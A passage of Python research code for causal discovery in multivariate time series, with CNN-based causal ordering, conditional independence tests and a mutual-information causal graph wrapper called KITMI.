pvalue = self.cd.get_shuffle_significance(X.T, xyz, value)\n pvalue = 0\n return pvalue, value\n\n\nclass tsCNN(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, 1)\n self.compact_in = nn.Linear(int(input_size/input_lag), 1)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=1,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # size after pooling?\n )\n # self.conv2 = nn.Sequential(\n # nn.Conv1d(\n # in_channels=16,\n # out_channels=8,\n # kernel_size=5,\n # stride=1,\n # padding=2,\n # ),\n # nn.ReLU(),\n # nn.MaxPool1d(kernel_size=2),\n #\n # )\n # self.compact_out = nn.Linear(8, 1)\n # self.out_1 = nn.Linear(input_size*2*2, input_size*2)\n # self.out_2 = nn.Linear(input_size*2, input_size)\n self.out = nn.Linear(input_size, output_size)\n\n def forward(self, x_dict):\n # print(x.size())\n compact_ts_dict = dict()\n names = list(x_dict.keys())\n for name in names:\n x = x_dict[name].view(-1, self.input_lag)\n compact_ts_i = self.compact_ts(x)\n compact_ts_dict[name] = compact_ts_i\n if name == names[0]:\n compact_ts = compact_ts_i\n else:\n compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n compact_in = self.compact_in(compact_ts)\n x = compact_in.view(-1, 1, 1)\n x = self.conv1(x)\n # print(x.size())\n # x = self.conv2(x)\n # x = x.view(-1, self.input_size*2*2)\n x = x.view(-1, self.input_size)\n # compact_out = self.compact_out(x)\n # output = self.out(compact_out)\n # x = self.out_1(x)\n # x = self.out_2(x)\n output = self.out(x)\n return output, compact_in, compact_ts_dict\n\n\ndef train(input_dict, target_tensor, model, optimizer, criterion):\n\n optimizer.zero_grad()\n # model.zero_grad()\n\n output, _, _ = model(input_dict)\n loss = criterion(output, target_tensor)\n\n loss.backward()\n optimizer.step()\n return loss.item()\n\n\ndef predict(input_dict, model):\n output, compact_out, compact_ts_dict = model(input_dict)\n return output, compact_out, compact_ts_dict\n\n\n# Function to produce noise\ndef add_noise(x, d, order, beta=0.5):\n x = x.copy()\n rand = np.random.randint(0, high=d, size=x.shape[0])\n for j in range(d):\n proba = np.random.random(size=1)\n if proba > beta:\n for o in range(order-1):\n i = j + o*d\n x[i, rand[j]] = 0\n return x\n\n\ndef mts_order(mts, order=4):\n new_mts = pd.DataFrame()\n for i in range(order):\n if i == order:\n i_data = mts[i:]\n else:\n i_data = mts[i:(-order + i)]\n if isinstance(mts, pd.DataFrame):\n names_col = mts.columns.values+ \"_\" + str(i + 1)\n elif isinstance(mts, pd.Series):\n names_col = mts.name + \"_\" + str(i + 1)\n else:\n print('error!')\n exit(0)\n for j in range(len(names_col)):\n new_mts[names_col[j]] = i_data[mts.columns.values[j]].values\n return new_mts\n\n\ndef tskiko_mv(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n verbose=True):\n \"\"\"\n :param data: input\n :param max_lag: max_lag\n :param learning_rate: learning rate of the autoencoder\n :param training_epoch: number of training epochs\n :param num_neurons: number of neurones in the hidden layer\n :param noise: boolean value, if true a denoising autoencoder should be use\n :param alpha:\n :param cond_ind_test: CMI or ParCorr\n :param verbose:\n :return: dict\n \"\"\"\n # cond_ind_test = \"CMI\"\n option = 1\n # Start Causal ordering\n start = time.time()\n\n # scaler = MinMaxScaler(feature_range=(-1, 1))\n # data = pd.DataFrame(scaler.fit_transform(data.values), columns=data.columns)\n # data.columns = data.columns.values.astype(str)\n d = data.shape[1]\n\n x = mts_order(data, order=max_lag) # [:-order]\n names_x = x.columns[:-d]\n # names_x = x.columns\n names_y = x.columns[-d:]\n y = x[names_y]\n x = x[names_x]\n\n summary_names = list(data.columns)\n temporal_names = dict()\n for s in range(d):\n temporal_names[summary_names[s]] = []\n for o in range(max_lag - 1):\n i = s + o * d\n temporal_names[summary_names[s]].append(names_x[i])\n\n cost_history = []\n indep_history = []\n test_indep_history = []\n\n x_train = x.copy()\n\n S = list(data.columns)\n sig = []\n pa = dict()\n for name in summary_names:\n pa[name] = []\n\n # todo compare each time series with its past\n for j in range(d-1):\n # if j != 0:\n # x_train.drop(temporal_names[selected], axis=1, inplace=True)\n # y.drop(y.columns[selected_loc], axis=1, inplace=True)\n # del S[selected_loc]\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag-1).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n # mini_batch_size = 5\n # N = x_train.shape[0] - 2\n # n_batch = N // mini_batch_size + (N % mini_batch_size != 0)\n # i_batch = (iter % N)\n if noise:\n x_train_n = add_noise(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag-1))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag-1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(\n # x_train_n.reshape(-1, x_train_n.shape[1], 1), dtype=torch.float,\n # device=device)\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n # k = d - 1 - j\n test_indep_values = []\n indep_values = []\n c = x_train.copy()\n input_dict = dict()\n for i in range(int(c.shape[1] / (max_lag - 1))):\n input_tensor = torch.tensor(\n c[temporal_names[S[i]]].values.reshape(-1, max_lag - 1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(c.values.reshape(c.shape[0], c.shape[1], 1), dtype=torch.float, device=device)\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n for s in range(len(S)):\n # for o in range(order-1):\n # i = s + o*len(S)\n # c[:, i] = np.zeros((x_train.shape[0]))\n e = y.values[:, s] - res[:, s]\n # hs = TestHSIC(kernel='rbf')\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n # pval, val = hs.fit(compact_res, e, c[temporal_names[S[s]]])\n cond = compact_ts_dict[S[s]].detach().numpy()\n pval, val = hs.fit(compact_res, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n indep_history.append(indep_values)\n test_indep_history.append(test_indep_values)\n # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n # indep_array = np.array(indep_values).reshape(-1, len(S))\n indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n selected = indep_array.idxmin(axis=1).loc[0]\n if verbose:\n print(\"since all p-values are the same, we are looking at the statistics...\")\n print('indeps :' + str(indep_values))\n else:\n if verbose:\n print('test indeps :' + str(test_indep_values))\n selected = test_indep_array.idxmax(axis=1).loc[0]\n pval_init = test_indep_array[selected].loc[0]\n sig.insert(0, selected)\n\n pa[selected] = summary_names.copy()\n # pa[S[idp_init]].remove(S[idp_init])\n for name in sig:\n pa[selected].remove(name)\n selected_loc = test_indep_array.columns.get_loc(selected)\n\n c = x_train.copy()\n\n print(\"selected:\" +str(selected))\n print(\"candidate parents\" +str(pa[selected]))\n\n x_train.drop(temporal_names[selected], axis=1, inplace=True)\n y.drop(y.columns[selected_loc], axis=1, inplace=True)\n del S[selected_loc]\n\n if len(S) == 1:\n sig[0] = S[0]\n print(sig)\n\n end = time.time()\n discovery_time = end - start\n print('time causal discovery: '+str(discovery_time))\n\n print(pa)\n\n res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n for k in pa.keys():\n res_unit_array[k].loc[k] = 1\n temp = pa[k]\n for i in temp:\n # if k == i:\n # res_unit_array[i].loc[i] = 1\n # else:\n if res_unit_array[i].loc[k] == 0:\n res_unit_array[i].loc[k] = 1\n res_unit_array[k].loc[i] = 2\n\n return res_unit_array\n\n\n\n\n# Function to produce noise\ndef add_noise_nbcb_k(x, d, order, beta=0.5):\n x = x.copy()\n rand = np.random.randint(0, high=d, size=x.shape[0])\n for j in range(x.shape[0]):\n proba = np.random.random(size=1)\n if proba > beta:\n # for o in range(order-1):\n o = order-1\n i = rand[j] + o*d\n x[j, i] = 0\n return x\n\nclass tsCNN_nbcb_k(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN_nbcb_k, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, input_lag)\n self.compact_in = nn.Linear(int(input_size), input_size)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=input_size,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # size after pooling?\n )\n self.out = nn.Linear(input_size, output_size)\n\n def forward(self, x_dict):\n compact_ts_dict = dict()\n names = list(x_dict.keys())\n for name in names:\n x = x_dict[name].view(-1, self.input_lag)\n compact_ts_i = self.compact_ts(x)\n compact_ts_dict[name] = compact_ts_i\n if name == names[0]:\n compact_ts = compact_ts_i\n else:\n compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n compact_in = self.compact_in(compact_ts)\n x = compact_in.view(-1, self.input_size, 1)\n x = self.conv1(x)\n x = x.view(-1, self.input_size)\n output = self.out(x)\n return output, compact_in, compact_ts_dict\n\n\ndef nbcb_k(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n verbose=True):\n \"\"\"\n :param data: input\n :param max_lag: max_lag\n :param learning_rate: learning rate of the autoencoder\n :param training_epoch: number of training epochs\n :param num_neurons: number of neurones in the hidden layer\n :param noise: boolean value, if true a denoising autoencoder should be use\n :param alpha:\n :param cond_ind_test: CMI or ParCorr\n :param verbose:\n :return: dict\n \"\"\"\n # Start Causal ordering\n start = time.time()\n\n d = data.shape[1]\n\n x = mts_order(data, order=max_lag) # [:-order]\n # names_x = x.columns[:-d]\n names_x = x.columns\n names_y = x.columns[-d:]\n y = x[names_y]\n x = x[names_x]\n\n summary_names = list(data.columns)\n temporal_names = dict()\n for s in range(d):\n temporal_names[summary_names[s]] = []\n for o in range(max_lag):\n i = s + o * d\n temporal_names[summary_names[s]].append(names_x[i])\n cost_history = []\n indep_history = []\n test_indep_history = []\n\n x_train = x.copy()\n\n S = list(data.columns)\n sig = []\n pa = dict()\n for name in summary_names:\n pa[name] = []\n\n for j in range(d-1):\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n if noise:\n x_train_n = add_noise_nbcb_k(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n test_indep_values = []\n indep_values = []\n # k = d - 1 - j\n for s in range(len(S)):\n c = x_train.copy()\n input_dict = dict()\n list_other = []\n for i in range(int(c.shape[1] / (max_lag))):\n if i == s:\n print(temporal_names[S[i]][-1])\n print(c[temporal_names[S[i]]])\n c[temporal_names[S[i]][-1]] = np.zeros((c.shape[0]))\n # c[temporal_names[S[i]]][temporal_names[S[i]]] = np.zeros((len(temporal_names[S[i]])))\n print(c[temporal_names[S[i]]])\n input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n input_dict[S[i]] = input_tensor\n else:\n list_other.append(i)\n input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n input_dict[S[i]] = input_tensor\n\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n e = y.values[:, s] - res[:, s]\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n\n # other = c[temporal_names[S[list_other[0]]]]\n other = compact_ts_dict[S[list_other[0]]].detach().numpy()\n cond = compact_ts_dict[S[s]].detach().numpy()\n\n pval, val = hs.fit(other, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n indep_history.append(indep_values)\n test_indep_history.append(test_indep_values)\n # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n # indep_array = np.array(indep_values).reshape(-1, len(S))\n indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n selected = indep_array.idxmin(axis=1).loc[0]\n if verbose:\n print(\"since all p-values are the same, we are looking at the statistics...\")\n print('indeps :' + str(indep_values))\n else:\n if verbose:\n print('test indeps :' + str(test_indep_values))\n selected = test_indep_array.idxmax(axis=1).loc[0]\n sig.insert(0, selected)\n\n pa[selected] = summary_names.copy()\n # pa[S[idp_init]].remove(S[idp_init])\n for name in sig:\n pa[selected].remove(name)\n selected_loc = test_indep_array.columns.get_loc(selected)\n\n c = x_train.copy()\n\n print(\"selected:\" +str(selected))\n print(\"candidate parents\" +str(pa[selected]))\n\n x_train.drop(temporal_names[selected], axis=1, inplace=True)\n y.drop(y.columns[selected_loc], axis=1, inplace=True)\n del S[selected_loc]\n\n if len(S) == 1:\n sig[0] = S[0]\n print(sig)\n\n end = time.time()\n discovery_time = end - start\n print('time causal discovery: '+str(discovery_time))\n\n print(pa)\n\n res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n for k in pa.keys():\n res_unit_array[k].loc[k] = 1\n temp = pa[k]\n for i in temp:\n # if k == i:\n # res_unit_array[i].loc[i] = 1\n # else:\n if res_unit_array[i].loc[k] == 0:\n res_unit_array[i].loc[k] = 1\n res_unit_array[k].loc[i] = 2\n\n return res_unit_array\n\n\nclass Graph:\n \"\"\"\n Graph structure\n 0: no edge\n 1: a tail -\n 2: arrow head ->\n \"\"\"\n def __init__(self, d):\n \"\"\"\n :param d: number of nodes\n \"\"\"\n self.d = d\n # self.edges = np.subtract(np.ones([n, n]), np.eye(n))\n self.edges = np.ones([d, d])\n self.sep = np.zeros([d, d, d])\n\n def del_edge(self, p, q):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n \"\"\"\n self.edges[p, q] = 0\n self.edges[q, p] = 0\n\n def add_sep(self, p, q, r):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n :param r: index of seperation set\n \"\"\"\n self.sep[p, q, r] = 1\n self.sep[q, p, r] = 1\n\n def search_adj(self, p):\n \"\"\"\n :param p: index of a time series\n :return: list of adjacencies of time series p and the number of adjacencies\n \"\"\"\n adj_1 = np.argwhere(self.edges[p, :] != 0)\n adj_2 = np.argwhere(self.edges[:, p] != 0)\n adj = np.intersect1d(adj_1, adj_2)\n if self.edges[p, p] == 1:\n adj = adj[adj != p]\n num_adj = len(adj)\n return adj, num_adj\n\n def search_adj_all(self):\n \"\"\"\n :return: list of adjacencies of all time series and the number of adjacencies per time series\n \"\"\"\n l_num_adj = []\n l_adj = []\n for p in range(self.d):\n adj, num_adj = self.search_adj(p)\n l_adj.append(adj.tolist())\n l_num_adj.append(num_adj)\n return l_adj, l_num_adj\n\n\nclass RankingList:\n def __init__(self):\n self.val = np.array([])\n self.elem_p = np.array([], dtype='int')\n self.elem_q = np.array([], dtype='int')\n self.elem_r = []\n\n def add(self, p, q, val, r):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n :param val: value of mutual information\n :param r: index of set of conditionals\n \"\"\"\n self.val = np.append(self.val, val)\n self.elem_p = np.append(self.elem_p, p)\n self.elem_q = np.append(self.elem_q, q)\n self.elem_r.append(r)\n\n def sort(self, descending=True):\n \"\"\"\n :param descending: (bool) sort ascending vs. descending. By default True\n \"\"\"\n idx = np.argsort(self.val)\n if descending:\n idx = np.flip(idx)\n # self.val = self.val[idx]\n # self.elem_p = self.elem_p[idx]\n # self.elem_q = self.elem_q[idx]\n # self.elem_r = self.elem_r[idx]\n self.val = np.take_along_axis(self.val, idx, axis=0)\n self.elem_p = np.take_along_axis(self.elem_p, idx, axis=0)\n self.elem_q = np.take_along_axis(self.elem_q, idx, axis=0)\n sorted_elem_r = []\n for i in idx:\n sorted_elem_r.append(self.elem_r[i])\n self.elem_r = sorted_elem_r\n\n\nclass KITMI:\n def __init__(self, series, sig_lev=0.05, lag_max=5, p_value=True, rank_using_p_value=False, verbose=True, num_processor=-1,\n graphical_optimization=True):\n \"\"\"\n Causal inference (Wrapper) using TMI and CTMI (contain functions for skeleton construction)\n :param series: d-time series (with possibility of different sampling rate)\n :param sig_lev: significance level. By default 0.05\n :param p_value: Use p_value for decision making. By default True\n :param verbose: Print results. By default: True\n :param num_processor: number of processors for parallelization. By default -1 (all)\n \"\"\"\n self.series = series\n self.graph = Graph(series.shape[1])\n\n training_epoch = 1000\n noise = True # d*(order-1)*2\n learning_rate = 0.01\n for i in range(series.shape[1]):\n for j in range(i+1, series.shape[1]):\n data_pair = series[[series.columns[i], series.columns[j]]]\n res_order_pair = tskiko_mv(data_pair, lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n if res_order_pair[series.columns[j]].loc[series.columns[i]] == 2:\n self.graph.edges[i, j] = 2\n if res_order_pair[series.columns[i]].loc[series.columns[j]] == 2:\n self.graph.edges[j, i] = 2\n # self.graph.edges = tskiko_mv(self.series[[series.columns[0], series.columns[1]]], lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n\n if verbose:\n print(\"Order\")\n print(self.graph.edges)\n\n\n self.series = series\n # # self.graph = Graph(series.shape[1])\n self.n = series.shape[0]\n self.d = series.shape[1]\n self.names = self.series.columns\n self.num_processor = num_processor\n self.p_value = p_value\n self.verbose = verbose\n self.sig_lev = sig_lev\n\n self.adaptive_window = True\n self.graphical_optimization = graphical_optimization\n if self.p_value == rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n elif not rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n else:\n print(\"Warning: rank_using_p_value can be True iff p_value is True. Using rank_using_p_value=False\")\n self.rank_using_p_value = False\n\n self.data_dict = dict()\n self.instantaneous_dict = dict()\n\n self.lags = []\n self.sampling_rate = dict()\n for col in range(series.shape[1]):\n _, s_r = get_sampling_rate(self.series[self.names[col]])\n self.sampling_rate[self.names[col]] = s_r\n\n self.alpha = get_alpha(series)\n\n for col in range(series.shape[1]):\n # self.lags.append(window_size(series[series.columns[col]], alpha=self.alpha, lag_max=lag_max))\n if not self.adaptive_window:\n self.lags.append(1)\n self.data_dict[self.names[col]] = window_representation(self.series[self.names[col]],\n windows_size=self.lags[col])\n self.instantaneous_dict[self.names[col]] = True\n\n if self.adaptive_window:\n self.gamma_matrix, self.window_matrix = self.gamma_matrix_window_matrix(self.series, series.columns)\n else:\n self.gamma_matrix = align_matrix(self.data_dict, series.columns, self.sampling_rate)\n\n self.cap_gamma_df = pd.DataFrame(columns=[\"p\", \"q\", \"r\", \"Grp\", \"Grq\"])\n\n self.mi_array = np.ones([self.graph.d, self.graph.d])\n self.cmi_array = np.ones([self.graph.d, self.graph.d])\n\n if self.verbose:\n print(\"n: \"+str(self.n))\n print(\"d: \"+str(self.d))\n print(\"names: \"+str(self.names))\n print(\"sampling_rate: \"+str(self.sampling_rate))\n print(\"significance level:\"+str(self.sig_lev))\n print(\"alpha:\"+str(self.alpha))\n print(\"window size:\"+str(self.lags))\n print(\"gamma matrix:\"+str(self.gamma_matrix))\n if self.adaptive_window:\n print(\"window matrix\"+str(self.window_matrix))\n print(\"instantaneous dict :\"+str(self.instantaneous_dict))\n print(\"Orderrrr\")\n print(self.graph.edges)\n\n def find_gamma_lambda_x_y(self, x, y, k=10, max_gamma=5):\n gamma_list = list(range(1, max_gamma))\n # todo add windows\n # ws_x_list = list(range(1, max_gamma - 2))\n # ws_y_list = list(range(1, max_gamma - 2))\n ws_x_list = [1]\n ws_y_list = [1]\n\n c = np.zeros([len(gamma_list), len(ws_x_list), len(ws_y_list)])\n\n for idx_g in range(len(gamma_list)):\n for idx_ws_x in range(len(ws_x_list)):\n x_w_rep = window_representation(x, windows_size=ws_x_list[idx_ws_x])\n for idx_ws_y in range(len(ws_y_list)):\n # if ws_x_list[idx_ws_x] == ws_y_list[idx_ws_y] == 1:\n y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n g = gamma_list[idx_g]\n\n if g > 0:\n y_w_rep = y_w_rep[g:]\n x_w_rep = x_w_rep.reset_index(drop=True)\n y_w_rep = y_w_rep.reset_index(drop=True)\n\n x_w_rep = x_w_rep[:-g]\n x_w_rep = x_w_rep.reset_index(drop=True)\n y_w_rep = y_w_rep.reset_index(drop=True)\n m = min(x_w_rep.shape[0], y_w_rep.shape[0])\n x_w_rep = x_w_rep[:m]\n y_w_rep = y_w_rep[:m]\n if len(x_w_rep.shape) == 1:\n x_w_rep = x_w_rep.to_frame()\n if len(y_w_rep.shape) == 1:\n y_w_rep = y_w_rep.to_frame()\n cmi = TestMI(p_value=False)\n _, val = cmi.fit(x_w_rep, y_w_rep)\n\n c[idx_g, idx_ws_x, idx_ws_y] = val\n # else:\n # if ws_x_list[idx_ws_x] != ws_y_list[idx_ws_y]:\n # y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n # g = gamma_list[idx_g]\n # _, val = tmi(x_w_rep, y_w_rep, sampling_rate_tuple, k=k, gamma=g, p_value=False)\n # c[idx_g, idx_ws_x, idx_ws_y] = val\n # else:\n # c[idx_g, idx_ws_x, idx_ws_y] = 0\n\n idx_g, idx_ws_x, idx_ws_y = np.where(c == np.max(c))\n idx_g = idx_g[0]\n idx_ws_x = idx_ws_x[0]\n idx_ws_y = idx_ws_y[0]\n g = gamma_list[idx_g]\n ws_x = ws_x_list[idx_ws_x]\n ws_y = ws_y_list[idx_ws_y]\n return g, ws_x, ws_y\n\n def gamma_matrix_window_matrix(self, series, keys, k=10, max_gamma=5):\n d = len(keys)\n g_matrix = np.zeros([d, d], dtype=int)\n window_matrix = np.zeros([d, d], dtype=list)\n\n for i in range(d):\n for j in range(d):\n if i != j:\n x = series[keys[i]]\n y = series[keys[j]]\n g, ws_x, ws_y = self.find_gamma_lambda_x_y(x, y, k=k, max_gamma=max_gamma)\n g_matrix[i, j] = g\n window_matrix[i, j] = [ws_x, ws_y]\n # window_matrix[j, i] = ws_y\n else:\n g_matrix[i, j] = 1\n window_matrix[i, j] = [1, 1]\n # window_matrix[j, i] = 1\n return pd.DataFrame(g_matrix, columns=keys, index=keys), pd.DataFrame(window_matrix, columns=keys, index=keys)\n\n def align_pq(self, x, y, gamma):\n x = x.loc[y.index[0]:]\n\n idx_x = x.index\n idx_y = y.index\n if gamma > 0:\n y = y[gamma:]\n idx_y = idx_y[gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n idx_x = idx_x[x.index]\n idx_y = idx_y[y.index]\n\n x = x[:-gamma]\n idx_x = idx_x[:-gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n else:\n print(\"Error: gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0])\n x = x[:m]\n y = y[:m]\n idx_x = idx_x[:m]\n idx_y = idx_y[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n return x, y, idx_x, idx_y\n\n def find_gamma_z_xy_util(self, x, y, z, k, Gamma, sig_samples=10000, measure=\"cmiknn\"):\n if Gamma > 0:\n x = x[Gamma:]\n y = y[Gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n\n z = z[:-Gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n else:\n print(\"Error: Gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0], z.shape[0])\n x = x[:m]\n y = y[:m]\n z = z[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n if len(z.shape) == 1:\n z = z.to_frame()\n\n cmi = TestMI(p_value=False)\n _, cmi_val = cmi.fit(x, y, z)\n return cmi_val\n\n def find_gamma_z_xy(self, x, y, z, k, max_gamma=5, measure=\"cmiknn\"):\n z = z.loc[y.index[0]:]\n\n c1 = list()\n\n c1.append(1)\n for G in range(1, max_gamma):\n val = self.find_gamma_z_xy_util(x, y, z, k=k, Gamma=G, measure=measure)\n c1.append(val)\n\n G = np.argmin(c1) + 1\n return G\n\n def align_pqr(self, v_p, v_q, idx_q, r, k):\n\n names_r = [*r.keys()]\n v_r = dict()\n nr_visted = []\n\n for nr in names_r:\n # idx_pq = idx_q\n\n v_p_new = v_p.copy()\n v_q_new = v_q.copy()\n v_p_new.index = idx_q\n v_q_new.index = idx_q\n g = self.find_gamma_z_xy(v_p_new, v_q_new, r[nr], k, max_gamma=5, measure=\"cmiknn\")\n print(\"Gamma = \" + str(g))\n # nr_processed = r[nr]\n\n # xyz_dict = {name_q: v_p_new, nr: nr_processed}\n # xyz_dict[name_q].index = idx_pq\n\n bool_idx = pd.DataFrame([False] * len(idx_q), columns=['bool'])\n bool_idx.index = idx_q\n\n v_q, r_processed, idx_q, _ = self.align_pq(v_q_new, r[nr], g)\n bool_idx.loc[idx_q] = True\n bool_idx = bool_idx['bool'].values\n v_p = v_p[bool_idx]\n # idx_p = idx_p[bool_idx]\n\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v][bool_idx]\n v_r[nr] = r_processed\n nr_visted.append(nr)\n\n v_p = v_p.reset_index(drop=True)\n v_q = v_q.reset_index(drop=True)\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v].reset_index(drop=True)\n\n return v_p, v_q, v_r\n\n def causation_entropy(self, p, q, r_list=[], k=10):\n gamma = self.gamma_matrix[self.names[q]].loc[self.names[p]]\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n pt_1, qt, idx_p, idx_q = self.align_pq(pt_1, qt, gamma)\n\n # qt = q.iloc[1:].values\n # pt_1 = p.iloc[:-1].values\n if len(r_list) > 0:\n # rt_1 = r.iloc[:-1].values\n r_1_dict = dict()\n for r_i in r_list:\n r_1_dict[self.names[r_i]] = self.series[self.names[r_i]].copy()\n pt_1, qt, r_1_dict = self.align_pqr(pt_1, qt, idx_q, r_1_dict, k)\n\n # Dict to df\n rt_1 = pd.DataFrame()\n for name in r_1_dict.keys():\n if isinstance(r_1_dict[name], pd.Series):\n r_1_dict[name] = r_1_dict[name].to_frame()\n rt_1[r_1_dict[name].columns] = r_1_dict[name].reset_index(drop=True)\n rt_1 = rt_1.values\n else:\n rt_1 = None\n\n qt = qt.values\n pt_1 = pt_1.values\n\n cmi = TestMI()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def causation_entropy_simple(self, p, q, r_list=[], k=10):\n pt_1 